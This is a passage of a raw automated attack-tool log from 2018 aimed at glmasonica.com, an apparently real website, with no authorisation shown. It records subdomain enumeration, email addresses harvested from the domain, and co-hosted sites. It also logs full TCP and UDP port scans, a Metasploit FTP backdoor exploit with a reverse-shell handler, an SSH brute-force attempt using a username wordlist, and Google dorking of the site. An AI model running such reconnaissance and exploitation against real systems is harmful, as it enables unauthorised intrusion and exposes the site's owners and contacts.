  744.         /_/  discover v0.5.0 - by @michenriksen
  745.  
  746. Identifying nameservers for glmasonica.com... Done
  747. Using nameservers:
  748.  
  749.  - 192.252.149.21
  750.  - 192.252.150.21
  751.  
  752. Checking for wildcard DNS... Wildcard detected!
  753. Identifying wildcard IPs... Done
  754. Filtering out hosts resolving to wildcard IPs
  755.  
  756. Running collector: HackerTarget... Done (1 host)
  757. Running collector: Shodan... Skipped
  758.  -> Key 'shodan' has not been set
  759. Running collector: Wayback Machine... Done (2 hosts)
  760. Running collector: Riddler... Skipped
  761.  -> Key 'riddler_username' has not been set
  762. Running collector: Certificate Search... Done (0 hosts)
  763. Running collector: Google Transparency Report... Done (0 hosts)
  764. Running collector: PTRArchive... Error
  765.  -> PTRArchive returned unexpected response code: 502
  766. Running collector: Censys... Skipped
  767.  -> Key 'censys_secret' has not been set
  768. Running collector: PassiveTotal... Skipped
  769.  -> Key 'passivetotal_key' has not been set
  770. Running collector: VirusTotal... Skipped
  771.  -> Key 'virustotal' has not been set
  772. Running collector: Netcraft... Done (0 hosts)
  773. Running collector: Threat Crowd... Done (0 hosts)
  774. Running collector: Dictionary... Done (26 hosts)
  775. Running collector: PublicWWW... Done (2 hosts)
  776. Running collector: DNSDB... Done (2 hosts)
  777.  
  778. Resolving 30 unique hosts...
  779.  
  780.  
  781. Wrote 0 hosts to:
  782.  
  783.  - file:///root/aquatone/glmasonica.com/hosts.txt
  784.  - file:///root/aquatone/glmasonica.com/hosts.json
  785.                            __
  786.   ____ _____ ___  ______ _/ /_____  ____  ___
  787.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  788. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  789. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  790.         /_/  takeover v0.5.0 - by @michenriksen
  791.  
  792. Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
  793. Loaded 25 domain takeover detectors
  794.  
  795. Identifying nameservers for glmasonica.com... Done
  796. Using nameservers:
  797.  
  798.  - 192.252.150.21
  799.  - 192.252.149.21
  800.  
  801. Checking hosts for domain takeover vulnerabilities...
  802.  
  803. Finished checking hosts:
  804.  
  805.  - Vulnerable     : 0
  806.  - Not Vulnerable : 0
  807.  
  808. Wrote 0 potential subdomain takeovers to:
  809.  
  810.  - file:///root/aquatone/glmasonica.com/takeovers.json
  811.  
  812.                            __
  813.   ____ _____ ___  ______ _/ /_____  ____  ___
  814.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  815. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  816. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  817.         /_/  scan v0.5.0 - by @michenriksen
  818.  
  819. Loaded 0 hosts from /root/aquatone/glmasonica.com/hosts.json
  820.  
  821. Probing 0 ports...
  822.  
  823. Wrote open ports to file:///root/aquatone/glmasonica.com/open_ports.txt
  824. Wrote URLs to file:///root/aquatone/glmasonica.com/urls.txt
  825.                            __
  826.   ____ _____ ___  ______ _/ /_____  ____  ___
  827.  / __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
  828. / /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / /  __/
  829. \__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
  830.         /_/  gather v0.5.0 - by @michenriksen
  831.  
  832. Processing 0 pages...
  833.  
  834. Finished processing pages:
  835.  
  836.  - Successful : 0
  837.  - Failed     : 0
  838.  
  839. Generating report...done
  840. Report pages generated:
  841. #######################################################################################################################################
  842.  
  843. [+] Emails found:
  844. --------------------------------------------------------------------------------------------------------------------------------------
  845. No emails found
  846.  
  847. [+] Hosts found in search engines:
  848. ---------------------------------------------------------------------------------------------------------------------------------------
  849. [-] Resolving hostnames IPs...
  850. 192.252.149.45:www.glmasonica.com
  851. [+] Virtual hosts:
  852. =======================================================================================================================================
  853. 192.252.149.45  puvesapuertas.com
  854. 192.252.149.45  www.glmasonica.com
  855. 192.252.149.45  www.careaction.org.hk
  856. 192.252.149.45  www.fivethousandyears.org
  857. 192.252.149.45  www.puvesapuertas.com
  858. 192.252.149.45  www.mexicanadelubricantes.com.mx
  859. 192.252.149.45  careaction.org.hk
  860.  
  861.  
  862.  
  863. [+] List of e-mails found:
  864. ----------------------------
  865. glmasonica@intnet.mu
  866. sales@icmauritius.com
  867. info@sakoa
  868. info@sakoa
  869. sales@icmauritius.com
  870.  
  871. #######################################################################################################################################
  872. PING glmasonica.com (192.252.149.45) 56(84) bytes of data.
  873. 64 bytes from 192.252.149.45 (192.252.149.45): icmp_seq=1 ttl=44 time=451 ms
  874.  
  875. --- glmasonica.com ping statistics ---
  876. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
  877. rtt min/avg/max/mdev = 451.921/451.921/451.921/0.000 ms
  878.  
  879. #######################################################################################################################################
  880. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:35 EDT
  881. Nmap scan report for glmasonica.com (192.252.149.45)
  882. Host is up (0.77s latency).
  883. Not shown: 460 closed ports, 6 filtered ports
  884. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  885. PORT     STATE SERVICE
  886. 21/tcp   open  ftp
  887. 22/tcp   open  ssh
  888. 80/tcp   open  http
  889. 110/tcp  open  pop3
  890. 143/tcp  open  imap
  891. 443/tcp  open  https
  892. 587/tcp  open  submission
  893. 993/tcp  open  imaps
  894. 995/tcp  open  pop3s
  895. 3306/tcp open  mysql
  896.  
  897. Nmap done: 1 IP address (1 host up) scanned in 8.50 seconds
  898. #######################################################################################################################################
  899. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
  900. Nmap scan report for glmasonica.com (192.252.149.45)
  901. Host is up.
  902.  
  903. PORT     STATE         SERVICE
  904. 53/udp   open|filtered domain
  905. 67/udp   open|filtered dhcps
  906. 68/udp   open|filtered dhcpc
  907. 69/udp   open|filtered tftp
  908. 88/udp   open|filtered kerberos-sec
  909. 123/udp  open|filtered ntp
  910. 137/udp  open|filtered netbios-ns
  911. 138/udp  open|filtered netbios-dgm
  912. 139/udp  open|filtered netbios-ssn
  913. 161/udp  open|filtered snmp
  914. 162/udp  open|filtered snmptrap
  915. 389/udp  open|filtered ldap
  916. 520/udp  open|filtered route
  917. 2049/udp open|filtered nfs
  918.  
  919. Nmap done: 1 IP address (1 host up) scanned in 3.42 seconds
  920. #######################################################################################################################################
  921.  + -- --=[Port 21 opened... running tests...
  922. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:36 EDT
  923. Nmap scan report for glmasonica.com (192.252.149.45)
  924. Host is up (0.20s latency).
  925.  
  926. PORT   STATE    SERVICE VERSION
  927. 21/tcp filtered ftp
  928. Too many fingerprints match this host to give specific OS details
  929.  
  930. TRACEROUTE (using proto 1/icmp)
  931. HOP RTT    ADDRESS
  932. 1   ... 30
  933.  
  934. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  935. Nmap done: 1 IP address (1 host up) scanned in 15.96 seconds
  936.   +-------------------------------------------------------+
  937.   |  METASPLOIT by Rapid7                                 |
  938.   +---------------------------+---------------------------+
  939.   |      __________________   |                           |
  940.   |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  941.   |             )=\           | |  EXPLOIT   \            |
  942.   |            // \\          | |_____________\_______    |
  943.   |           //   \\         | |==[msf >]============\   |
  944.   |          //     \\        | |______________________\  |
  945.   |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  946.   |        //         \\      |  *********************    |
  947.   +---------------------------+---------------------------+
  948.   |      o O o                |        \'\/\/\/'/         |
  949.   |              o O          |         )======(          |
  950.   |                 o         |       .'  LOOT  '.        |
  951.   | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  952.   | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  953.   | |________________|__|)__| |    |     __||_)     |     |
  954.   | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  955.   |  = = = = = = = = = = = =  |     '--------------'      |
  956.   +---------------------------+---------------------------+
  957.  
  958.  
  959.        =[ metasploit v4.16.49-dev                         ]
  960. + -- --=[ 1750 exploits - 1003 auxiliary - 304 post       ]
  961. + -- --=[ 536 payloads - 40 encoders - 10 nops            ]
  962. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  963.  
  964. RHOST => glmasonica.com
  965. RHOSTS => glmasonica.com
  966. [-] glmasonica.com:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (glmasonica.com:21).
  967. [*] Exploit completed, but no session was created.
  968. [*] Started reverse TCP double handler on 10.211.1.21:4444
  969. [*] glmasonica.com:21 - Sending Backdoor Command
  970. [-] glmasonica.com:21 - Not backdoored
  971. [*] Exploit completed, but no session was created.
  972.  + -- --=[Port 22 opened... running tests...
  973. # general
  974. (gen) banner: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u3
  975. (gen) software: OpenSSH 7.4p1
  976. (gen) compatibility: OpenSSH 7.3+, Dropbear SSH 2016.73+
  977. (gen) compression: enabled (zlib@openssh.com)
  978.  
  979. # key exchange algorithms
  980. (kex) curve25519-sha256                     -- [warn] unknown algorithm
  981. (kex) curve25519-sha256@libssh.org          -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
  982. (kex) ecdh-sha2-nistp256                    -- [fail] using weak elliptic curves
  983.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  984. (kex) ecdh-sha2-nistp384                    -- [fail] using weak elliptic curves
  985.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  986. (kex) ecdh-sha2-nistp521                    -- [fail] using weak elliptic curves
  987.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  988. (kex) diffie-hellman-group-exchange-sha256  -- [warn] using custom size modulus (possibly weak)
  989.                                             `- [info] available since OpenSSH 4.4
  990. (kex) diffie-hellman-group16-sha512         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  991. (kex) diffie-hellman-group18-sha512         -- [info] available since OpenSSH 7.3
  992. (kex) diffie-hellman-group14-sha256         -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
  993. (kex) diffie-hellman-group14-sha1           -- [warn] using weak hashing algorithm
  994.                                             `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
  995.  
  996. # host-key algorithms
  997. (key) ssh-rsa                               -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
  998. (key) rsa-sha2-512                          -- [info] available since OpenSSH 7.2
  999. (key) rsa-sha2-256                          -- [info] available since OpenSSH 7.2
  1000. (key) ecdsa-sha2-nistp256                   -- [fail] using weak elliptic curves
  1001.                                             `- [warn] using weak random number generator could reveal the key
  1002.                                             `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
  1003. (key) ssh-ed25519                           -- [info] available since OpenSSH 6.5
  1004.  
  1005. # encryption algorithms (ciphers)
  1006. (enc) chacha20-poly1305@openssh.com         -- [info] available since OpenSSH 6.5
  1007.                                             `- [info] default cipher since OpenSSH 6.9.
  1008. (enc) aes128-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1009. (enc) aes192-ctr                            -- [info] available since OpenSSH 3.7
  1010. (enc) aes256-ctr                            -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
  1011. (enc) aes128-gcm@openssh.com                -- [info] available since OpenSSH 6.2
  1012. (enc) aes256-gcm@openssh.com                -- [info] available since OpenSSH 6.2
  1013.  
  1014. # message authentication code algorithms
  1015. (mac) umac-64-etm@openssh.com               -- [warn] using small 64-bit tag size
  1016.                                             `- [info] available since OpenSSH 6.2
  1017. (mac) umac-128-etm@openssh.com              -- [info] available since OpenSSH 6.2
  1018. (mac) hmac-sha2-256-etm@openssh.com         -- [info] available since OpenSSH 6.2
  1019. (mac) hmac-sha2-512-etm@openssh.com         -- [info] available since OpenSSH 6.2
  1020. (mac) hmac-sha1-etm@openssh.com             -- [warn] using weak hashing algorithm
  1021.                                             `- [info] available since OpenSSH 6.2
  1022. (mac) umac-64@openssh.com                   -- [warn] using encrypt-and-MAC mode
  1023.                                             `- [warn] using small 64-bit tag size
  1024.                                             `- [info] available since OpenSSH 4.7
  1025. (mac) umac-128@openssh.com                  -- [warn] using encrypt-and-MAC mode
  1026.                                             `- [info] available since OpenSSH 6.2
  1027. (mac) hmac-sha2-256                         -- [warn] using encrypt-and-MAC mode
  1028.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1029. (mac) hmac-sha2-512                         -- [warn] using encrypt-and-MAC mode
  1030.                                             `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
  1031. (mac) hmac-sha1                             -- [warn] using encrypt-and-MAC mode
  1032.                                             `- [warn] using weak hashing algorithm
  1033.                                             `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
  1034.  
  1035. # algorithm recommendations (for OpenSSH 7.4)
  1036. (rec) -ecdh-sha2-nistp521                   -- kex algorithm to remove
  1037. (rec) -ecdh-sha2-nistp384                   -- kex algorithm to remove
  1038. (rec) -diffie-hellman-group14-sha1          -- kex algorithm to remove
  1039. (rec) -ecdh-sha2-nistp256                   -- kex algorithm to remove
  1040. (rec) -diffie-hellman-group-exchange-sha256 -- kex algorithm to remove
  1041. (rec) -ecdsa-sha2-nistp256                  -- key algorithm to remove
  1042. (rec) -hmac-sha2-512                        -- mac algorithm to remove
  1043. (rec) -umac-128@openssh.com                 -- mac algorithm to remove
  1044. (rec) -hmac-sha2-256                        -- mac algorithm to remove
  1045. (rec) -umac-64@openssh.com                  -- mac algorithm to remove
  1046. (rec) -hmac-sha1                            -- mac algorithm to remove
  1047. (rec) -hmac-sha1-etm@openssh.com            -- mac algorithm to remove
  1048. (rec) -umac-64-etm@openssh.com              -- mac algorithm to remove
  1049.  
  1050. Starting Nmap 7.70 ( https://nmap.org ) at 2018-04-15 22:37 EDT
  1051. Nmap scan report for glmasonica.com (192.252.149.45)
  1052. Host is up (0.35s latency).
  1053.  
  1054. PORT   STATE SERVICE VERSION
  1055. 22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u3 (protocol 2.0)
  1056. |_ssh-auth-methods: ERROR: Script execution failed (use -d to debug)
  1057. |_ssh-brute: ERROR: Script execution failed (use -d to debug)
  1058. | ssh-hostkey:
  1059. |   2048 92:e0:eb:16:64:35:7a:26:99:37:fb:a5:d0:9f:75:9e (RSA)
  1060. |_  256 33:25:93:99:9b:e4:22:61:af:25:6b:58:67:a7:29:f9 (ED25519)
  1061. |_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
  1062. |_ssh-run: ERROR: Script execution failed (use -d to debug)
  1063. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  1064. Device type: specialized|WAP
  1065. Running: iPXE 1.X, Linux 2.4.X|2.6.X
  1066. OS CPE: cpe:/o:ipxe:ipxe:1.0.0%2b cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22
  1067. OS details: iPXE 1.0.0+, Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22)
  1068. Network Distance: 1 hop
  1069. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
  1070.  
  1071. TRACEROUTE (using port 22/tcp)
  1072. HOP RTT        ADDRESS
  1073. 1   5601.55 ms 192.252.149.45
  1074.  
  1075. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  1076. Nmap done: 1 IP address (1 host up) scanned in 121.78 seconds
  1077.  
  1078.   Metasploit Park, System Security Interface
  1079.   Version 4.0.5, Alpha E
  1080.   Ready...
  1081.   > access security
  1082.   access: PERMISSION DENIED.
  1083.   > access security grid
  1084.   access: PERMISSION DENIED.
  1085.   > access main security grid
  1086.   access: PERMISSION DENIED....and...
  1087.   YOU DIDN'T SAY THE MAGIC WORD!
  1088.   YOU DIDN'T SAY THE MAGIC WORD!
  1089.   YOU DIDN'T SAY THE MAGIC WORD!
  1090.   YOU DIDN'T SAY THE MAGIC WORD!
  1091.   YOU DIDN'T SAY THE MAGIC WORD!
  1092.   YOU DIDN'T SAY THE MAGIC WORD!
  1093.   YOU DIDN'T SAY THE MAGIC WORD!
  1094.  
  1095.  
  1096.        =[ metasploit v4.16.49-dev                         ]
  1097. + -- --=[ 1750 exploits - 1003 auxiliary - 304 post       ]
  1098. + -- --=[ 536 payloads - 40 encoders - 10 nops            ]
  1099. + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
  1100.  
  1101. USER_FILE => /BruteX/wordlists/simple-users.txt
  1102. RHOSTS => glmasonica.com
  1103. [!] RHOST is not a valid option for this module. Did you mean RHOSTS?
  1104. RHOST => glmasonica.com
  1105. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
  1106. [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
  1107. [*] glmasonica.com:22     - Scanned 1 of 1 hosts (100% complete)
  1108. [*] Auxiliary module execution completed
  1109.  + -- --=[Port 23 closed... skipping.
  1110.  + -- --=[Port 25 closed... skipping.
  1111.  + -- --=[Port 53 closed... skipping.
  1112.  + -- --=[Port 67 closed... skipping.
  1113.  + -- --=[Port 68 closed... skipping.
  1114.  + -- --=[Port 69 closed... skipping.
  1115.  + -- --=[Port 79 closed... skipping.
  1116.  + -- --=[Port 80 opened... running tests...
  1117. #######################################################################################################################################
  1118.  
  1119. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  1120. + -- --=[Target: glmasonica.com:80
  1121. + -- --=[Site not vulnerable to Cross-Site Tracing!
  1122. + -- --=[Site not vulnerable to Host Header Injection!
  1123. + -- --=[Site vulnerable to Cross-Frame Scripting!
  1124. + -- --=[Site vulnerable to Clickjacking!
  1125.  
  1126. HTTP/1.1 400 Bad Request
  1127. Date: Mon, 16 Apr 2018 02:40:14 GMT
  1128. Server: Apache
  1129. Content-Length: 226
  1130. Connection: close
  1131. Content-Type: text/html; charset=iso-8859-1
  1132.  
  1133. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1134. <html><head>
  1135. <title>400 Bad Request</title>
  1136. </head><body>
  1137. <h1>Bad Request</h1>
  1138. <p>Your browser sent a request that this server could not understand.<br />
  1139. </p>
  1140. </body></html>
  1141.  
  1142. HTTP/1.1 400 Bad Request
  1143. Date: Mon, 16 Apr 2018 02:40:16 GMT
  1144. Server: Apache
  1145. Content-Length: 226
  1146. Connection: close
  1147. Content-Type: text/html; charset=iso-8859-1
  1148.  
  1149. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1150. <html><head>
  1151. <title>400 Bad Request</title>
  1152. </head><body>
  1153. <h1>Bad Request</h1>
  1154. <p>Your browser sent a request that this server could not understand.<br />
  1155. </p>
  1156. </body></html>
  1157. #######################################################################################################################################
  1158. + -- --=[Checking if X-Content options are enabled on glmasonica.com...
  1159.  
  1160. + -- --=[Checking if X-Frame options are enabled on glmasonica.com...
  1161.  
  1162. + -- --=[Checking if X-XSS-Protection header is enabled on glmasonica.com...
  1163.  
  1164. + -- --=[Checking HTTP methods on glmasonica.com...
  1165.  
  1166. + -- --=[Checking if TRACE method is enabled on glmasonica.com...
  1167.  
  1168. + -- --=[Checking for META tags on glmasonica.com...
  1169. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
  1170. <meta name="Keywords" content="" />
  1171. <meta name="Description" content="" />
  1172.  
  1173. + -- --=[Checking for open proxy on glmasonica.com...
  1174. <body>
  1175.     <div id="notice">
  1176.         <h1>RESOURCE NOT FOUND</h1>
  1177.         <h2><b>google.com</b></h2>
  1178.     </div>
  1179.     <div>
  1180.         server308.com: No site configured at this address.
  1181.     </div>
  1182. </body>
  1183. </html>
  1184.  
  1185. + -- --=[Enumerating software on glmasonica.com...
  1186. Server: Apache
  1187.  
  1188. + -- --=[Checking if Strict-Transport-Security is enabled on glmasonica.com...
  1189.  
  1190. + -- --=[Checking for Flash cross-domain policy on glmasonica.com...
  1191. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1192. <html><head>
  1193. <title>404 Not Found</title>
  1194. </head><body>
  1195. <h1>Not Found</h1>
  1196. <p>The requested URL /crossdomain.xml was not found on this server.</p>
  1197. <p>Additionally, a 404 Not Found
  1198. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1199. </body></html>
  1200.  
  1201. + -- --=[Checking for Silverlight cross-domain policy on glmasonica.com...
  1202. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1203. <html><head>
  1204. <title>404 Not Found</title>
  1205. </head><body>
  1206. <h1>Not Found</h1>
  1207. <p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
  1208. <p>Additionally, a 404 Not Found
  1209. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1210. </body></html>
  1211.  
  1212. + -- --=[Checking for HTML5 cross-origin resource sharing on glmasonica.com...
  1213.  
  1214. + -- --=[Retrieving robots.txt on glmasonica.com...
  1215. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1216. <html><head>
  1217. <title>404 Not Found</title>
  1218. </head><body>
  1219. <h1>Not Found</h1>
  1220. <p>The requested URL /robots.txt was not found on this server.</p>
  1221. <p>Additionally, a 404 Not Found
  1222. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1223. </body></html>
  1224.  
  1225. + -- --=[Retrieving sitemap.xml on glmasonica.com...
  1226. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  1227. <html><head>
  1228. <title>404 Not Found</title>
  1229. </head><body>
  1230. <h1>Not Found</h1>
  1231. <p>The requested URL /sitemap.xml was not found on this server.</p>
  1232. <p>Additionally, a 404 Not Found
  1233. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1234. </body></html>
  1235.  
  1236. + -- --=[Checking cookie attributes on glmasonica.com...
  1237. Set-Cookie: projector=949fea65f1db43f2b5c0369ddc79c6a6; path=/
  1238.  
  1239. + -- --=[Checking for ASP.NET Detailed Errors on glmasonica.com...
  1240. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1241. error was encountered while trying to use an ErrorDocument to handle the request.</p>
  1242.  
  1243.  
  1244. #######################################################################################################################################
  1245.  
  1246.     _____  .701F. .iBR.   .7CL. .70BR.   .7BR. .7BR'''Cq.   .70BR.      .1BR'''Yp, .8BR'''Cq.  
  1247.    (_____)   01     01N.    C     01       C     01   .01.    01          01    Yb   01   .01.
  1248.    (() ())   01     C YCb   C     01       C     01   ,C9     01          01    dP   01   ,C9  
  1249.     \   /    01     C  .CN. C     01       C     0101dC9      01          01'''bg.   0101dC9  
  1250.      \ /     01     C   .01.C     01       C     01  YC.      01      ,   01    .Y   01  YC.  
  1251.      /=\     01     C     Y01     YC.     ,C     01   .Cb.    01     ,C   01    ,9   01   .Cb.
  1252.     [___]  .J01L. .JCL.    YC      .b0101d'.   .J01L. .J01. .J01010101C .J0101Cd9  .J01L. .J01./ 2.1
  1253.  
  1254.  
  1255. ------------------------------------------------------------------------------------------------------------------------
  1256.  
  1257. [ ! ] Starting SCANNER INURLBR 2.1 at [15-04-2018 22:41:29]
  1258. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
  1259. It is the end user's responsibility to obey all applicable local, state and federal laws.
  1260. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  1261.  
  1262. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-glmasonica.com.txt  ]
  1263. [ INFO ][ DORK ]::[ site:glmasonica.com ]
  1264. [ INFO ][ SEARCHING ]:: {
  1265. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.sk ]
  1266.  
  1267. [ INFO ][ SEARCHING ]::
  1268. -[:::]
  1269. [ INFO ][ ENGINE ]::[ GOOGLE API ]
  1270.  
  1271. [ INFO ][ SEARCHING ]::
  1272. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1273. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.sa ID: 007843865286850066037:b0heuatvay8 ]
  1274.  
  1275. [ INFO ][ SEARCHING ]::
  1276. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
  1277.  
  1278. [ INFO ][ TOTAL FOUND VALUES ]:: [ 13 ]
  1279.  
  1280.  
  1281.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1282. |_[ + ] [ 0 / 13 ]-[22:41:51] [ - ]
  1283. |_[ + ] Target:: [ http://www.glmasonica.com/ ]
  1284. |_[ + ] Exploit::
  1285. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1286. |_[ + ] More details::  / -  / , ISP:
  1287. |_[ + ] Found:: UNIDENTIFIED
  1288.  
  1289.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1290. |_[ + ] [ 1 / 13 ]-[22:41:53] [ - ]
  1291. |_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=en ]
  1292. |_[ + ] Exploit::
  1293. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1294. |_[ + ] More details::  / -  / , ISP:
  1295. |_[ + ] Found:: UNIDENTIFIED
  1296.  
  1297.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1298. |_[ + ] [ 2 / 13 ]-[22:41:56] [ - ]
  1299. |_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=fr ]
  1300. |_[ + ] Exploit::
  1301. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1302. |_[ + ] More details::  / -  / , ISP:
  1303. |_[ + ] Found:: UNIDENTIFIED
  1304.  
  1305.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1306. |_[ + ] [ 3 / 13 ]-[22:42:01] [ - ]
  1307. |_[ + ] Target:: [ http://glmasonica.com/display/files/programme.pdf ]
  1308. |_[ + ] Exploit::
  1309. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1310. |_[ + ] More details::  / -  / , ISP:
  1311. |_[ + ] Found:: UNIDENTIFIED
  1312.  
  1313.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1314. |_[ + ] [ 4 / 13 ]-[22:42:04] [ - ]
  1315. |_[ + ] Target:: [ http://www.glmasonica.com/faq.php?l=fr ]
  1316. |_[ + ] Exploit::
  1317. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1318. |_[ + ] More details::  / -  / , ISP:
  1319. |_[ + ] Found:: UNIDENTIFIED
  1320.  
  1321.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1322. |_[ + ] [ 5 / 13 ]-[22:42:06] [ - ]
  1323. |_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=fr ]
  1324. |_[ + ] Exploit::
  1325. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1326. |_[ + ] More details::  / -  / , ISP:
  1327. |_[ + ] Found:: UNIDENTIFIED
  1328.  
  1329.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1330. |_[ + ] [ 6 / 13 ]-[22:42:09] [ - ]
  1331. |_[ + ] Target:: [ http://www.glmasonica.com/history_glm.php?l=en ]
  1332. |_[ + ] Exploit::
  1333. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1334. |_[ + ] More details::  / -  / , ISP:
  1335. |_[ + ] Found:: UNIDENTIFIED
  1336.  
  1337.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1338. |_[ + ] [ 7 / 13 ]-[22:42:12] [ - ]
  1339. |_[ + ] Target:: [ http://www.glmasonica.com/history_freemasonry.php?l=en ]
  1340. |_[ + ] Exploit::
  1341. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1342. |_[ + ] More details::  / -  / , ISP:
  1343. |_[ + ] Found:: UNIDENTIFIED
  1344.  
  1345.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1346. |_[ + ] [ 8 / 13 ]-[22:42:14] [ - ]
  1347. |_[ + ] Target:: [ http://www.glmasonica.com/introduction.php?l=fr ]
  1348. |_[ + ] Exploit::
  1349. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1350. |_[ + ] More details::  / -  / , ISP:
  1351. |_[ + ] Found:: UNIDENTIFIED
  1352.  
  1353.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1354. |_[ + ] [ 9 / 13 ]-[22:42:18] [ - ]
  1355. |_[ + ] Target:: [ http://glmasonica.com/display/files/agm_fr.pdf ]
  1356. |_[ + ] Exploit::
  1357. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1358. |_[ + ] More details::  / -  / , ISP:
  1359. |_[ + ] Found:: UNIDENTIFIED
  1360.  
  1361.  _[ - ]::--------------------------------------------------------------------------------------------------------------
  1362. |_[ + ] [ 10 / 13 ]-[22:42:21] [ - ]
  1363. |_[ + ] Target:: [ http://www.glmasonica.com/display/files/agminfo_fr.pdf ]
  1364. |_[ + ] Exploit::
  1365. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache  , IP:192.252.149.45:80
  1366. |_[ + ] More details::  / -  / , ISP:
  1367. |_[ + ] Found:: UNIDENTIFIED
